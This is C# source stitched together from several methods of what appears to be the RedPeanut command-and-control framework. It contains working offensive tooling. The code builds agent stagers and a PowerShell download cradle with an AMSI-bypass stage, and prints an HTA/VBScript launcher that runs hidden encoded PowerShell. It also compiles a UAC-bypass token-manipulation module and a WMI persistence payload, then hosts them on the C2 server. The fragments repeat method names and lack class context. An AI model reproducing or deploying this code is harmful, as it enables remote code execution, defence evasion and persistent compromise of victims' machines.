string sourceinstallutil = File.ReadAllText(Path.Combine(folderrpath, INSTALLUTIL_TEMPLATE))
.Replace("#{assembly}", agentCompBase64);
Builder.GenerateExe(sourceinstallutil, filename);
if (File.Exists(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename)))
{
if (hosted)
{
//Add resource to webserver storage
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(null, filename));
Console.WriteLine("[*] Resource added to webserver resources");
return;
}
else
{
//Write file to tmp env dir
File.WriteAllBytes(Path.Combine(Path.GetTempPath(), filename),
File.ReadAllBytes(Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER, filename)));
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
}
}
else
{
Console.WriteLine("[x] Error creating IndtallUtil dll");
}
}
}
}
catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
return;
}
}
public static string ReplaceAgentProfile(string src, string serverkey, int targetframework, ListenerConfig config)
{
string source = src
.Replace("#HOST#", config.GetHost())
.Replace("#PORT#", config.GetPort().ToString())
.Replace("#PARAM#", config.GetProfile().HttpPost.Param)
.Replace("#SERVERKEY#", RedPeanut.Program.GetServerKey())
.Replace("#PAGEGET#", ParseUri(config.GetProfile().HttpGet.ApiPath))
.Replace("#PAGEPOST#", ParseUri(config.GetProfile().HttpPost.ApiPath))
.Replace("#USERAGENT#", config.GetProfile().UserAgent)
.Replace("#PIPENAME#", "")
.Replace("#COVERED#", config.GetProfile().HtmlCovered.ToString().ToLower())
.Replace("#TARGETCLASS#", config.GetProfile().TargetClass)
.Replace("#SPAWN#", config.GetProfile().Spawn)
.Replace("#FRAMEWORK#", targetframework.ToString())
.Replace("#MANAGED#", config.GetProfile().InjectionManaged.ToString());
string headers = "";
foreach (HttpHeader h in config.GetProfile().HttpGet.Client.Headers)
{
try
{
if (!h.Name.Equals("Connection"))
{
int t = (int)Enum.Parse(typeof(HttpRequestHeader), h.Name.Replace("-", ""), true);
headers += string.Format("webHeaderCollection.Add(HttpRequestHeader.{0}, \"{1}\");" + Environment.NewLine, h.Name.Replace("-", ""), h.Value);
}
}
catch (Exception)
{
Console.WriteLine("[x] Error parsing header {0}", h.Name);
}
}
source = source
.Replace("#HEADERS#", headers);
return(source);
}
private void Run()
{
try
{
string host = ((AgentInstanceHttp)agent).GetAddress();
int port = ((AgentInstanceHttp)agent).GetPort();
int profileid = ((AgentInstanceHttp)agent).GetProfileid();
int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
string pipename = "";
if (agent.Pivoter != null)
{
host = agent.Pivoter.SysInfo.Ip;
port = 0;
profileid = RedPeanutC2.server.GetDefaultProfile();
targetframework = agent.TargetFramework;
pipename = agent.AgentId;
}
else
{
host = ((AgentInstanceHttp)agent).GetAddress();
port = ((AgentInstanceHttp)agent).GetPort();
profileid = ((AgentInstanceHttp)agent).GetProfileid();
targetframework = agent.TargetFramework;
}
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
string source;
if (string.IsNullOrEmpty(pipename))
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
/*ModuleConfig modconfig = new ModuleConfig
* {
* Assembly = stagerstr,
* Method = "Execute",
* Moduleclass = "RedPeanutRP",
* Parameters = new string[] { "pippo" }
* };
*
* TaskMsg task = new TaskMsg
* {
* TaskType = "module",
* ModuleTask = modconfig,
* Agentid = agent.AgentId
* };
*
* if (agent.Pivoter != null)
* task.AgentPivot = agent.Pivoter.AgentId;
*
*/
source = File.ReadAllText(Path.Combine(folderrpath, UACTOKEN_TEMPLATE))
.Replace("#NUTCLR#", Convert.ToBase64String(CompressGZipAssembly(
Builder.GenerateShellcode(stagerstr, RandomAString(10, new Random()) + ".exe", "RedPeanutRP", "Execute", new string[] { "pippo" })
))
)
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
.Replace("#BINARY#", binary)
.Replace("#ARGUMENTS#", arguments)
.Replace("#PATH#", path);
string uacbypass = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
RunAssemblyBase64(
uacbypass,
"TokenManipulation",
new string[] { " " },
agent);
}
}
catch (Exception)
{
Console.WriteLine("[*] Errore generating task");
}
}
private void Run()
{
List <string> args = new List <string>();
try
{
if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
{
return;
}
else
{
// Parse .cs sorce and repalce variable
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
string assemblyBase64 = Builder.GenerateDllBase64(source, filename);
Dictionary <string, string> arg = new Dictionary <string, string>();
arg.Add("#{lhost}", lhost);
arg.Add("#{lport}", lport.ToString());
string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;
uricontent = uricontent.TrimStart('/');
if (!uricontent.EndsWith("/"))
{
uricontent += "/";
}
arg.Add("#{uri}", uricontent + "s2_" + filename);
byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
Dictionary <string, string> argagent = new Dictionary <string, string>();
argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
if (hosted)
{
//Add resource to webserver storage
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen_s1, filename));
c2manager.GetC2Server().RegisterWebResource("s2_" + filename, new WebResourceInstance(gen_s2, "s2_" + filename));
Console.WriteLine("[*] Resource added to webserver resources");
Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
Console.WriteLine("[*]");
Console.WriteLine("[*] Cradle example");
Console.WriteLine("[*]");
Console.WriteLine("<script language = \"VBScript\">");
Console.WriteLine(" Function etaget()");
Console.WriteLine("");
Console.WriteLine(" Dim ahsten");
Console.WriteLine(" Set ahsten = CreateObject(\"Wscript.Shell\")");
Console.WriteLine(" ahsten.run \"powershell.exe -nop -w 1 -enc {0}\", 0, true", gen_s0.GetScriptText());
Console.WriteLine(" End Function");
Console.WriteLine("");
Console.WriteLine(" etaget");
Console.WriteLine(" self.close");
Console.WriteLine("</script>");
Console.WriteLine("[*]");
return;
}
else
{
//Write file to tmp env dir
File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen_s1.GetScriptText());
File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + filename), gen_s2.GetScriptText());
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + filename));
}
}
}
}
catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
return;
}
}
private void Run()
{
try
{
List <string> args = new List <string>();
if (!string.IsNullOrEmpty(processname) && !string.IsNullOrEmpty(eventname))
{
//Create webresource
//Register web resource
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
string filename = RandomAString(10, new Random()).ToLower();
ListenerConfig conf = new ListenerConfig("",
((AgentInstanceHttp)agent).GetAddress(),
((AgentInstanceHttp)agent).GetPort(),
Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()),
((AgentInstanceHttp)agent).GetProfileid());
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
string assemblyBase64 = Builder.GenerateDllBase64(source, filename + ".dll");
byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
Dictionary <string, string> argagent = new Dictionary <string, string>();
argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(((AgentInstanceHttp)agent).GetProfileid()).ContentUri;
uricontent = uricontent.TrimStart('/');
if (!uricontent.EndsWith("/"))
{
uricontent += "/";
}
Dictionary <string, string> arg = new Dictionary <string, string>
{
{ "#{lhost}", ((AgentInstanceHttp)agent).GetAddress() },
{ "#{lport}", ((AgentInstanceHttp)agent).GetPort().ToString() },
{ "#{uri}", uricontent + "s2_" + filename + ".ps1" }
};
PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
//Add resource to webserver storage
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(filename + ".ps1", new WebResourceInstance(gen_s1, filename + ".ps1"));
c2manager.GetC2Server().RegisterWebResource("s2_" + filename + ".ps1", new WebResourceInstance(gen_s2, "s2_" + filename + ".ps1"));
Console.WriteLine("[*] Resource added to webserver resources");
string proto = "";
if (ssl)
{
proto = "https";
}
else
{
proto = "http";
}
string url = string.Format("{0}://{1}:{2}/{3}{4}", proto, ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), uricontent, filename + ".ps1");
string perssrc = File.ReadAllText(Path.Combine(folderrpath, PERSWMI_TEMPLATE));
perssrc = Replacer.ReplacePersWMI(perssrc, eventname, url, processname, encoded);
RunAssemblyBase64(
Convert.ToBase64String(
CompressGZipAssembly(
Builder.BuidStreamAssembly(perssrc, RandomAString(10, new Random()).ToLower() + ".dll", 40, compprofile: CompilationProfile.Persistence)
)
),
"PersWMI",
new string[] { " " },
agent);
return;
}
}
catch (Exception e)
{
Console.WriteLine("[x] Error generating task {0}", e.Message);
}
}
public RedPeanutC2(C2Server server, ListenerConfig lconfig)
{
this.Lconfig = lconfig;
RedPeanutC2.server = server;
this.ssl = lconfig.GetSsl();
}
private void Run()
{
List <string> args = new List <string>();
try
{
if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
{
return;
}
else
{
if (lang == "vbs")
{
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
//Building agent
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
string outfilename = RandomAString(10, new Random()) + ".dll";
Builder.GenerateDll(source, outfilename, 35);
//Add resource to webserver
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));
string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
if (!uricontent.EndsWith("/"))
{
uricontent += "/";
}
string resourcepath = uricontent + outfilename;
//Build shooter assembly
source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);
string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);
HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null);
if (hosted)
{
//Add resource to webserver storage
c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
Console.WriteLine("[*] Resource added to webserver resources");
Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
return;
}
else
{
//Write file to tmp env dir
File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
}
}
}
else
{
if (lang == "powershell")
{
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
string psfilename = RandomString(10, new Random()) + ".ps1";
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll");
Dictionary <string, string> arg = new Dictionary <string, string>();
arg.Add("#{lhost}", lhost);
arg.Add("#{lport}", lport.ToString());
string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;
uricontent = uricontent.TrimStart('/');
if (!uricontent.EndsWith("/"))
{
uricontent += "/";
}
arg.Add("#{uri}", uricontent + "s2_" + psfilename);
byte[] assemblybytte = Convert.FromBase64String(assemblyBase64);
string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));
Dictionary <string, string> argagent = new Dictionary <string, string>();
argagent.Add("#{bytelen}", assemblybytte.Length.ToString());
PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);
HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null);
if (hosted)
{
//Add resource to webserver storage
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename));
c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename));
Console.WriteLine("[*] Resource added to webserver resources");
Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
return;
}
else
{
//Write file to tmp env dir
File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText());
File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText());
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename));
Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename));
}
}
}
else
{
Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
return;
}
}
}
}catch (Exception e)
{
Console.WriteLine("[*] Error running task build {0}", e.Message);
return;
}
}